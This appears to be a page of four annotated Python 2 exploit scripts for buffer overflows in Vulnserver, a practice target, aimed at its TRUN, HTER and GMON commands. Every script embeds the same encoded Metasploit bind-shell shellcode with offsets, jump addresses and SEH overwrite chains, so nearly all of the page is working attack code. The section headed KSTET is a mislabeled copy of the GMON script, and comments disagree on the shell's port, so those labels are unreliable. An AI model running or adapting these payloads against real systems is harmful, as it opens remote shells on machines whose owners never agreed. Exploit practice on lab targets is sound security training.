Vulnerable Server


TRUN Exploit

   1 #!/usr/bin/env python
   2 # -*- coding: utf-8 -*-
   3 # Name: trun-exploit-vs.tmpl
   4 # Author: Dirk <dirk@fake.mx>
   5 # Kind of Exploit: Simple Bufferoverflow
   6 # This Exploit aims at TRUN command from the vurnable server
   7 # http://www.thegreycorner.com/2010/12/introducing-vulnserver.html
   8 # Tested on WinXP SP3 
   9 # =================================================================================================#
  10 # Vurnable commands: GTER at 320bytes; KSTET at 220bytes; HTER at 2220bytes (looks most promising) #
  11 # Badcharacters : \x00, \x0A \x0D                                                                  #
  12 # =================================================================================================#
  13 #
     # NOTE(review): Python 2 only. The `print` statements below use the
     # statement form, and the "\x.." literals are byte strings; under
     # Python 3 they would be text objects and socket.send() would reject them.
     #
  14 # Howto calculate the right place for you shellcode!
  15 # Calculating the position where we should place our final section of shellcode is actually quite simple.
  16 # Since we are jumping backwards 768 bytes from the end of the CALL statement at the end of our small block of
  17 # shellcode, we simply need to subtract 768, less the length of the data between the end of the small shellcode
  18 # and the end of the block of INT3 instructions, from the value we used for the size of the block of INT3
  19 # instructions.
  20 
  21 # The data between the end of the INT3 instructions and the end of the small shellcode is 22 bytes in length. Subtracted
  22 # from 768, this makes 746. My value for the size of the INT 3 block of characters (determined when we ran pattern_offset
  23 # earlier) was 3498. Subtracting 746 from 3498 makes 2752. If you received a different value from the pattern_offset program
  24 # earlier, please make sure you subtract 746 from this value to determine where your shellcode will start.
  25 
  26 import socket,sys,time,struct
  27 
  28 
  29 #----------------------------------------------------------------------------------#
  30 # msfpayload windows/shell_bind_tcp LPORT=9988 R| msfencode -b '\x00\x0A\x0D' -t c #
  31 # [*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)                     #
  32 #----------------------------------------------------------------------------------#
  33 
     # Buffer layout, built left to right: 2004 filler bytes, a 4-byte
     # little-endian value from struct.pack, a 16-byte NOP slide, the
     # quoted payload (24 lines of 15 bytes plus one of 8 = 368 bytes,
     # matching the size reported in the header), then 0xCC padding up to
     # a fixed total of 3000 bytes.
     # NOTE(review): the inline comment on the payload says LPORT=4444 while
     # the generator command in the header says LPORT=9988 -- one of the two
     # is stale; verify before relying on either.
  34 evil = "A" * 2004 # Pattern offset at 2004 bytes
  35 evil += struct.pack("<L", 0x625011AF) #"\xEF\xBE\xAD\xDE" # struct.pack("L", 0x625011AF)
  36 evil += "\x90" * 16
  37 #evil += "\xCC" * 4 # For debugging purposes just disable to test the exploit
  38 evil +=  ("\x33\xc9\x83\xe9\xaa\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
  39           "\xbb\xc1\x9c\x35\x83\xee\xfc\xe2\xf4\x47\x29\x15\x35\xbb\xc1"
  40           "\xfc\xbc\x5e\xf0\x4e\x51\x30\x93\xac\xbe\xe9\xcd\x17\x67\xaf"
  41           "\x4a\xee\x1d\xb4\x76\xd6\x13\x8a\x3e\xad\xf5\x17\xfd\xfd\x49"
  42           "\xb9\xed\xbc\xf4\x74\xcc\x9d\xf2\x59\x31\xce\x62\x30\x93\x8c"
  43           "\xbe\xf9\xfd\x9d\xe5\x30\x81\xe4\xb0\x7b\xb5\xd6\x34\x6b\x91"
  44           "\x17\x7d\xa3\x4a\xc4\x15\xba\x12\x7f\x09\xf2\x4a\xa8\xbe\xba"
  45           "\x17\xad\xca\x8a\x01\x30\xf4\x74\xcc\x9d\xf2\x83\x21\xe9\xc1"
  46           "\xb8\xbc\x64\x0e\xc6\xe5\xe9\xd7\xe3\x4a\xc4\x11\xba\x12\xfa"#Shellcode Bing Shell LPORT=4444
  47           "\xbe\xb7\x8a\x17\x6d\xa7\xc0\x4f\xbe\xbf\x4a\x9d\xe5\x32\x85"
  48           "\xb8\x11\xe0\x9a\xfd\x6c\xe1\x90\x63\xd5\xe3\x9e\xc6\xbe\xa9"
  49           "\x2a\x1a\x68\xd3\xf2\xae\x35\xbb\xa9\xeb\x46\x89\x9e\xc8\x5d"
  50           "\xf7\xb6\xba\x32\x44\x14\x24\xa5\xba\xc1\x9c\x1c\x7f\x95\xcc"
  51           "\x5d\x92\x41\xf7\x35\x44\x14\xcc\x65\xeb\x91\xdc\x65\xfb\x91"
  52           "\xf4\xdf\xb4\x1e\x7c\xca\x6e\x48\x5b\x04\x60\x92\xf4\x37\xbb"
  53           "\xd0\xc0\xbc\x5d\xab\x8c\x63\xec\xa9\x5e\xee\x8c\xa6\x63\xe0"
  54           "\xe8\x96\xf4\x82\x52\xf9\x63\xca\x6e\x92\xcf\x62\xd3\xb5\x70"
  55           "\x0e\x5a\x3e\x49\x62\x32\x06\xf4\x40\xd5\x8c\xfd\xca\x6e\xa9"
  56           "\xff\x58\xdf\xc1\x15\xd6\xec\x96\xcb\x04\x4d\xab\x8e\x6c\xed"
  57           "\x23\x61\x53\x7c\x85\xb8\x09\xba\xc0\x11\x71\x9f\xd1\x5a\x35"
  58           "\xff\x95\xcc\x63\xed\x97\xda\x63\xf5\x97\xca\x66\xed\xa9\xe5"
  59           "\xf9\x84\x47\x63\xe0\x32\x21\xd2\x63\xfd\x3e\xac\x5d\xb3\x46"
  60           "\x81\x55\x44\x14\x27\xc5\x0e\x63\xca\x5d\x1d\x54\x21\xa8\x44"
  61           "\x14\xa0\x33\xc7\xcb\x1c\xce\x5b\xb4\x99\x8e\xfc\xd2\xee\x5a"
  62           "\xd1\xc1\xcf\xca\x6e\xc1\x9c\x35")
     # 2004 + 4 + 16 + 368 = 2392 bytes at this point, so 608 bytes of
     # padding are appended; a negative count would silently append nothing.
  63 evil += "\xCC" * (3000 - len(evil))
  64 
  65 
  66 if len(sys.argv) < 3:
  67     print "Missing arguments for host and port"
  68 else:
  69     s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
         # socket.connect() returns None, so `connect` never holds anything
         # useful; a connection failure here is outside the try below and
         # propagates as an uncaught exception.
  70     connect=s.connect((str(sys.argv[1]),int(sys.argv[2])))
  71     try:
  72         s.send("TRUN . /%s\r\n" % evil) # !!!! Change Server Command
             # `s.close` without parentheses is only an attribute lookup;
             # the socket is never actually closed (same for `so.close` below).
  73         s.close
  74         ##################################################
             # Second connection presumably serves as a liveness check (per the
             # "Now crash?" comment): a refused connect() lands in the except
             # branch. TODO confirm that is the intent.
  75         so=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  76         connect=so.connect((str(sys.argv[1]),int(sys.argv[2])))
  77         time.sleep(1)
  78         so.close # Now crash?
  79         ##################################################
  80     except:
             # Bare except hides the actual error (including KeyboardInterrupt);
             # nothing about the cause is printed.
  81         print "[-]ERROR"
  82         sys.exit(-1)


HTER Exploit

   1 #!/usr/bin/env python
   2 # -*- coding: utf-8 -*-
   3 # Name: exploit-vs.tmpl
   4 # Author: Dirk <dirk@fake.mx>
   5 # This Exploit aims at the HTER command from the vurnable server
   6 # http://www.thegreycorner.com/2010/12/introducing-vulnserver.html
   7 #
   8 # =================================================================================================#
   9 # Vurnable commands: HTER                                                                          #
  10 # Badcharacters : \x00, \x0A \x0D                                                                  #
  11 # =================================================================================================#
  12 #
     # NOTE(review): Python 2 only (statement-form `print`, byte-string
     # "\x.." literals). The header previously said TRUN, but the command
     # actually sent below is HTER.
  13 
     # `struct` is imported but not used anywhere in this script; the
     # address below is written out as literal bytes instead.
  14 import socket,sys,time,struct
  15 
  16 #----------------------------------------------------------------------------------#
  17 # msfpayload windows/shell_bind_tcp LPORT=9988 R| msfencode -b '\x00\x0A\x0D' -t c #
  18 # [*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)                     #
  19 #----------------------------------------------------------------------------------#
  20 
  21 
  22 
     # Buffer layout, built left to right: 2620 filler bytes, eight copies of
     # a 4-byte value (32 bytes), then the quoted 368-byte payload.
     # NOTE(review): the inline comment mentions an offset of 1024 bytes while
     # the code uses 2620 -- the comment looks stale; verify before reuse.
     # NOTE(review): header says LPORT=9988, inline payload comment says 4444.
  23 evil = "A" * 2620 # Pattern offset # Calculated the offset at exactly 1024 bytes
  24 evil += "\xAF\x11\x50\x62" * 8 # EIP override 0x62501203 625011AF
  25 # Can't remember if the shellcode was valid
  26 
  27 evil +=  ("\x33\xc9\x83\xe9\xaa\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
  28           "\xbb\xc1\x9c\x35\x83\xee\xfc\xe2\xf4\x47\x29\x15\x35\xbb\xc1"
  29           "\xfc\xbc\x5e\xf0\x4e\x51\x30\x93\xac\xbe\xe9\xcd\x17\x67\xaf"
  30           "\x4a\xee\x1d\xb4\x76\xd6\x13\x8a\x3e\xad\xf5\x17\xfd\xfd\x49"
  31           "\xb9\xed\xbc\xf4\x74\xcc\x9d\xf2\x59\x31\xce\x62\x30\x93\x8c"
  32           "\xbe\xf9\xfd\x9d\xe5\x30\x81\xe4\xb0\x7b\xb5\xd6\x34\x6b\x91"
  33           "\x17\x7d\xa3\x4a\xc4\x15\xba\x12\x7f\x09\xf2\x4a\xa8\xbe\xba"
  34           "\x17\xad\xca\x8a\x01\x30\xf4\x74\xcc\x9d\xf2\x83\x21\xe9\xc1"
  35           "\xb8\xbc\x64\x0e\xc6\xe5\xe9\xd7\xe3\x4a\xc4\x11\xba\x12\xfa"#Shellcode Bing Shell LPORT=4444
  36           "\xbe\xb7\x8a\x17\x6d\xa7\xc0\x4f\xbe\xbf\x4a\x9d\xe5\x32\x85"
  37           "\xb8\x11\xe0\x9a\xfd\x6c\xe1\x90\x63\xd5\xe3\x9e\xc6\xbe\xa9"
  38           "\x2a\x1a\x68\xd3\xf2\xae\x35\xbb\xa9\xeb\x46\x89\x9e\xc8\x5d"
  39           "\xf7\xb6\xba\x32\x44\x14\x24\xa5\xba\xc1\x9c\x1c\x7f\x95\xcc"
  40           "\x5d\x92\x41\xf7\x35\x44\x14\xcc\x65\xeb\x91\xdc\x65\xfb\x91"
  41           "\xf4\xdf\xb4\x1e\x7c\xca\x6e\x48\x5b\x04\x60\x92\xf4\x37\xbb"
  42           "\xd0\xc0\xbc\x5d\xab\x8c\x63\xec\xa9\x5e\xee\x8c\xa6\x63\xe0"
  43           "\xe8\x96\xf4\x82\x52\xf9\x63\xca\x6e\x92\xcf\x62\xd3\xb5\x70"
  44           "\x0e\x5a\x3e\x49\x62\x32\x06\xf4\x40\xd5\x8c\xfd\xca\x6e\xa9"
  45           "\xff\x58\xdf\xc1\x15\xd6\xec\x96\xcb\x04\x4d\xab\x8e\x6c\xed"
  46           "\x23\x61\x53\x7c\x85\xb8\x09\xba\xc0\x11\x71\x9f\xd1\x5a\x35"
  47           "\xff\x95\xcc\x63\xed\x97\xda\x63\xf5\x97\xca\x66\xed\xa9\xe5"
  48           "\xf9\x84\x47\x63\xe0\x32\x21\xd2\x63\xfd\x3e\xac\x5d\xb3\x46"
  49           "\x81\x55\x44\x14\x27\xc5\x0e\x63\xca\x5d\x1d\x54\x21\xa8\x44"
  50           "\x14\xa0\x33\xc7\xcb\x1c\xce\x5b\xb4\x99\x8e\xfc\xd2\xee\x5a"
  51           "\xd1\xc1\xcf\xca\x6e\xc1\x9c\x35")
     # NOTE(review): len(evil) is already 2620 + 32 + 368 = 3020 here, so
     # 2620 - len(evil) is negative and this line appends nothing (Python
     # treats a negative repeat count as zero). The total stays 3020 bytes.
  52 evil += "C" * (2620-len(evil))
  53 
  54 
  55 
  56 
  57 if len(sys.argv) < 3:
  58     print "Missing arguments for host and port"
  59 else:
  60     s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
         # socket.connect() returns None, so `connect` is never meaningful;
         # a failure here is outside the try below and propagates uncaught.
  61     connect=s.connect((str(sys.argv[1]),int(sys.argv[2])))
  62     try:
  63         s.send("HTER /%s\r\n" % evil) # !!!! Change Server Command
             # `s.close` without parentheses is only an attribute lookup;
             # neither socket in this block is ever actually closed.
  64         s.close
  65         ##################################################
             # Second connection presumably acts as a liveness check (see the
             # "Now crash?" comment); a refused connect() lands in the except
             # branch. TODO confirm.
  66         so=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  67         connect=so.connect((str(sys.argv[1]),int(sys.argv[2])))
  68         time.sleep(1)
  69         so.close # Now crash?
  70         ##################################################
  71     except:
             # Bare except hides the real error (including KeyboardInterrupt);
             # the cause is never printed.
  72         print "[-]ERROR"
  73         sys.exit(-1)


GMON Exploit

   1 #!/usr/bin/env python
   2 # -*- coding: utf-8 -*-
   3 # Name: gmon-exploit-vs.py
   4 # Author: Dirk <dirk@fake.mx>
   5 # Kind of Exploit: SEH based Bufferoverflow
   6 # This Exploit aims at the GMON command from the vurnable server
   7 # http://www.thegreycorner.com/2010/12/introducing-vulnserver.html
   8 # Plattform: WinXP SP3
   9 # =================================================================================================#
  10 # Vurnable commands: GTER at 320bytes; KSTET at 220bytes; HTER at 2220bytes (looks most promising) #
  11 # Badcharacters : \x00, \x0A \x0D                                                                  #
  12 # =================================================================================================#
  13 
     # NOTE(review): Python 2 only (statement-form `print`, byte-string
     # "\x.." literals). The command list in the header above does not
     # mention GMON at all; it looks copied from the TRUN template.
  14 
  15 import socket,sys,time,struct
  16 
  17 #----------------------------------------------------------------------------------#
  18 # msfpayload windows/shell_bind_tcp LPORT=9988 R| msfencode -b '\x00\x0A\x0D' -t c #
  19 # [*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)                     #
  20 #----------------------------------------------------------------------------------#
  21 
     # Buffer layout, built left to right: 2752 bytes of 0xCC, a 16-byte NOP
     # slide, the quoted 368-byte payload (2752 + 16 + 368 = 3136 so far),
     # NOP padding up to 3498, a 4-byte next-SEH field, a 4-byte packed
     # little-endian handler address, a 14-byte stub (3520 so far), then NOP
     # padding up to a fixed total of 4000 bytes.
     # NOTE(review): header says LPORT=9988, inline payload comment says 4444.
  22 evil = "\xCC" * 2752 # Pattern offset
  23 evil += "\x90" * 16 # Space sometimes needed to get the shellcode working
  24 evil +=  ("\x33\xc9\x83\xe9\xaa\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
  25          "\xbb\xc1\x9c\x35\x83\xee\xfc\xe2\xf4\x47\x29\x15\x35\xbb\xc1"
  26          "\xfc\xbc\x5e\xf0\x4e\x51\x30\x93\xac\xbe\xe9\xcd\x17\x67\xaf"
  27          "\x4a\xee\x1d\xb4\x76\xd6\x13\x8a\x3e\xad\xf5\x17\xfd\xfd\x49"
  28          "\xb9\xed\xbc\xf4\x74\xcc\x9d\xf2\x59\x31\xce\x62\x30\x93\x8c"
  29          "\xbe\xf9\xfd\x9d\xe5\x30\x81\xe4\xb0\x7b\xb5\xd6\x34\x6b\x91"
  30          "\x17\x7d\xa3\x4a\xc4\x15\xba\x12\x7f\x09\xf2\x4a\xa8\xbe\xba"
  31          "\x17\xad\xca\x8a\x01\x30\xf4\x74\xcc\x9d\xf2\x83\x21\xe9\xc1"
  32          "\xb8\xbc\x64\x0e\xc6\xe5\xe9\xd7\xe3\x4a\xc4\x11\xba\x12\xfa"#Shellcode Bing Shell LPORT=4444
  33          "\xbe\xb7\x8a\x17\x6d\xa7\xc0\x4f\xbe\xbf\x4a\x9d\xe5\x32\x85"
  34          "\xb8\x11\xe0\x9a\xfd\x6c\xe1\x90\x63\xd5\xe3\x9e\xc6\xbe\xa9"
  35          "\x2a\x1a\x68\xd3\xf2\xae\x35\xbb\xa9\xeb\x46\x89\x9e\xc8\x5d"
  36          "\xf7\xb6\xba\x32\x44\x14\x24\xa5\xba\xc1\x9c\x1c\x7f\x95\xcc"
  37          "\x5d\x92\x41\xf7\x35\x44\x14\xcc\x65\xeb\x91\xdc\x65\xfb\x91"
  38          "\xf4\xdf\xb4\x1e\x7c\xca\x6e\x48\x5b\x04\x60\x92\xf4\x37\xbb"
  39          "\xd0\xc0\xbc\x5d\xab\x8c\x63\xec\xa9\x5e\xee\x8c\xa6\x63\xe0"
  40          "\xe8\x96\xf4\x82\x52\xf9\x63\xca\x6e\x92\xcf\x62\xd3\xb5\x70"
  41          "\x0e\x5a\x3e\x49\x62\x32\x06\xf4\x40\xd5\x8c\xfd\xca\x6e\xa9"
  42          "\xff\x58\xdf\xc1\x15\xd6\xec\x96\xcb\x04\x4d\xab\x8e\x6c\xed"
  43          "\x23\x61\x53\x7c\x85\xb8\x09\xba\xc0\x11\x71\x9f\xd1\x5a\x35"
  44          "\xff\x95\xcc\x63\xed\x97\xda\x63\xf5\x97\xca\x66\xed\xa9\xe5"
  45          "\xf9\x84\x47\x63\xe0\x32\x21\xd2\x63\xfd\x3e\xac\x5d\xb3\x46"
  46          "\x81\x55\x44\x14\x27\xc5\x0e\x63\xca\x5d\x1d\x54\x21\xa8\x44"
  47          "\x14\xa0\x33\xc7\xcb\x1c\xce\x5b\xb4\x99\x8e\xfc\xd2\xee\x5a"
  48          "\xd1\xc1\xcf\xca\x6e\xc1\x9c\x35")
     # Pads to exactly 3498 bytes, i.e. up to (not after) the next-SEH field
     # written on the following line; a negative count would append nothing.
  49 evil += "\x90" * (3498 -len(evil)) # data after SEH Handler
  50 evil += "\xEB\x0F\x90\x90" # Pointer to Next-SEH
  51 evil += struct.pack("<L", 0x625010B4) # SEH override POP POP RETN
  52 evil += "\x59\xFE\xCD\xFE\xCD\xFE\xCD\xFF\xE1\xE8\xF2\xFF\xFF\xFF"
  53 evil += "\x90" * (4000 -len(evil)) #
  54 
  55 
  56 if len(sys.argv) < 3:
  57     print "Missing arguments for host and port"
  58 else:
  59     s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
         # socket.connect() returns None, so `connect` is never meaningful;
         # a failure here is outside the try below and propagates uncaught.
  60     connect=s.connect((str(sys.argv[1]),int(sys.argv[2])))
  61     try:
  62         s.send("GMON /%s\r\n" % evil)
             # `s.close` without parentheses is only an attribute lookup;
             # neither socket in this block is ever actually closed.
  63         s.close
  64         ##################################################
             # Second connection presumably acts as a liveness check (see the
             # "Now crash?" comment); a refused connect() lands in the except
             # branch. TODO confirm.
  65         so=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  66         connect=so.connect((str(sys.argv[1]),int(sys.argv[2])))
  67         time.sleep(1)
  68         so.close # Now crash?
  69         ##################################################
  70     except:
             # Bare except hides the real error (including KeyboardInterrupt);
             # the cause is never printed.
  71         print "[-]ERROR"
  72         sys.exit(-1)


KSTET Exploit

   1 #!/usr/bin/env python
   2 # -*- coding: utf-8 -*-
   3 # Name: gmon-exploit-vs.py
   4 # Author: Dirk <dirk@fake.mx>
   5 # Kind of Exploit: SEH based Bufferoverflow
   6 # This Exploit aims at the GMON command from the vurnable server
   7 # http://www.thegreycorner.com/2010/12/introducing-vulnserver.html
   8 # Plattform: WinXP SP3
   9 # =================================================================================================#
  10 # Vurnable commands: GTER at 320bytes; KSTET at 220bytes; HTER at 2220bytes (looks most promising) #
  11 # Badcharacters : \x00, \x0A \x0D                                                                  #
  12 # =================================================================================================#
  13 
     # NOTE(review): this listing sits under the "KSTET Exploit" heading but
     # is the GMON script again -- same file name, same buffer, and it sends
     # "GMON" below. Its own header lists KSTET at 220 bytes, which does not
     # match the 4000-byte buffer built here. Most likely a paste error; the
     # KSTET script itself is not on this page.
     # Python 2 only (statement-form `print`, byte-string "\x.." literals).
  14 import socket,sys,time,struct
  15 
  16 #----------------------------------------------------------------------------------#
  17 # msfpayload windows/shell_bind_tcp LPORT=9988 R| msfencode -b '\x00\x0A\x0D' -t c #
  18 # [*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)                     #
  19 #----------------------------------------------------------------------------------#
  20 
     # Buffer layout, built left to right: 2752 bytes of 0xCC, a 16-byte NOP
     # slide, the quoted 368-byte payload (3136 so far), NOP padding up to
     # 3498, a 4-byte next-SEH field, a 4-byte packed little-endian handler
     # address, a 14-byte stub (3520 so far), then NOP padding up to 4000.
     # NOTE(review): header says LPORT=9988, inline payload comment says 4444.
  21 evil = "\xCC" * 2752 # Pattern offset
  22 evil += "\x90" * 16 # Space sometimes needed to get the shellcode working
  23 evil +=  ("\x33\xc9\x83\xe9\xaa\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
  24          "\xbb\xc1\x9c\x35\x83\xee\xfc\xe2\xf4\x47\x29\x15\x35\xbb\xc1"
  25          "\xfc\xbc\x5e\xf0\x4e\x51\x30\x93\xac\xbe\xe9\xcd\x17\x67\xaf"
  26          "\x4a\xee\x1d\xb4\x76\xd6\x13\x8a\x3e\xad\xf5\x17\xfd\xfd\x49"
  27          "\xb9\xed\xbc\xf4\x74\xcc\x9d\xf2\x59\x31\xce\x62\x30\x93\x8c"
  28          "\xbe\xf9\xfd\x9d\xe5\x30\x81\xe4\xb0\x7b\xb5\xd6\x34\x6b\x91"
  29          "\x17\x7d\xa3\x4a\xc4\x15\xba\x12\x7f\x09\xf2\x4a\xa8\xbe\xba"
  30          "\x17\xad\xca\x8a\x01\x30\xf4\x74\xcc\x9d\xf2\x83\x21\xe9\xc1"
  31          "\xb8\xbc\x64\x0e\xc6\xe5\xe9\xd7\xe3\x4a\xc4\x11\xba\x12\xfa"#Shellcode Bing Shell LPORT=4444
  32          "\xbe\xb7\x8a\x17\x6d\xa7\xc0\x4f\xbe\xbf\x4a\x9d\xe5\x32\x85"
  33          "\xb8\x11\xe0\x9a\xfd\x6c\xe1\x90\x63\xd5\xe3\x9e\xc6\xbe\xa9"
  34          "\x2a\x1a\x68\xd3\xf2\xae\x35\xbb\xa9\xeb\x46\x89\x9e\xc8\x5d"
  35          "\xf7\xb6\xba\x32\x44\x14\x24\xa5\xba\xc1\x9c\x1c\x7f\x95\xcc"
  36          "\x5d\x92\x41\xf7\x35\x44\x14\xcc\x65\xeb\x91\xdc\x65\xfb\x91"
  37          "\xf4\xdf\xb4\x1e\x7c\xca\x6e\x48\x5b\x04\x60\x92\xf4\x37\xbb"
  38          "\xd0\xc0\xbc\x5d\xab\x8c\x63\xec\xa9\x5e\xee\x8c\xa6\x63\xe0"
  39          "\xe8\x96\xf4\x82\x52\xf9\x63\xca\x6e\x92\xcf\x62\xd3\xb5\x70"
  40          "\x0e\x5a\x3e\x49\x62\x32\x06\xf4\x40\xd5\x8c\xfd\xca\x6e\xa9"
  41          "\xff\x58\xdf\xc1\x15\xd6\xec\x96\xcb\x04\x4d\xab\x8e\x6c\xed"
  42          "\x23\x61\x53\x7c\x85\xb8\x09\xba\xc0\x11\x71\x9f\xd1\x5a\x35"
  43          "\xff\x95\xcc\x63\xed\x97\xda\x63\xf5\x97\xca\x66\xed\xa9\xe5"
  44          "\xf9\x84\x47\x63\xe0\x32\x21\xd2\x63\xfd\x3e\xac\x5d\xb3\x46"
  45          "\x81\x55\x44\x14\x27\xc5\x0e\x63\xca\x5d\x1d\x54\x21\xa8\x44"
  46          "\x14\xa0\x33\xc7\xcb\x1c\xce\x5b\xb4\x99\x8e\xfc\xd2\xee\x5a"
  47          "\xd1\xc1\xcf\xca\x6e\xc1\x9c\x35")
     # Pads to exactly 3498 bytes, i.e. up to (not after) the next-SEH field
     # written on the following line; a negative count would append nothing.
  48 evil += "\x90" * (3498 -len(evil)) # data after SEH Handler
  49 evil += "\xEB\x0F\x90\x90" # Pointer to Next-SEH
  50 evil += struct.pack("<L", 0x625010B4) # SEH override POP POP RETN
  51 evil += "\x59\xFE\xCD\xFE\xCD\xFE\xCD\xFF\xE1\xE8\xF2\xFF\xFF\xFF"
  52 evil += "\x90" * (4000 -len(evil)) #
  53 
  54 
  55 if len(sys.argv) < 3:
  56     print "Missing arguments for host and port"
  57 else:
  58     s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
         # socket.connect() returns None, so `connect` is never meaningful;
         # a failure here is outside the try below and propagates uncaught.
  59     connect=s.connect((str(sys.argv[1]),int(sys.argv[2])))
  60     try:
  61         s.send("GMON /%s\r\n" % evil)
             # `s.close` without parentheses is only an attribute lookup;
             # neither socket in this block is ever actually closed.
  62         s.close
  63         ##################################################
             # Second connection presumably acts as a liveness check (see the
             # "Now crash?" comment); a refused connect() lands in the except
             # branch. TODO confirm.
  64         so=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  65         connect=so.connect((str(sys.argv[1]),int(sys.argv[2])))
  66         time.sleep(1)
  67         so.close # Now crash?
  68         ##################################################
  69     except:
             # Bare except hides the real error (including KeyboardInterrupt);
             # the cause is never printed.
  70         print "[-]ERROR"
  71         sys.exit(-1)

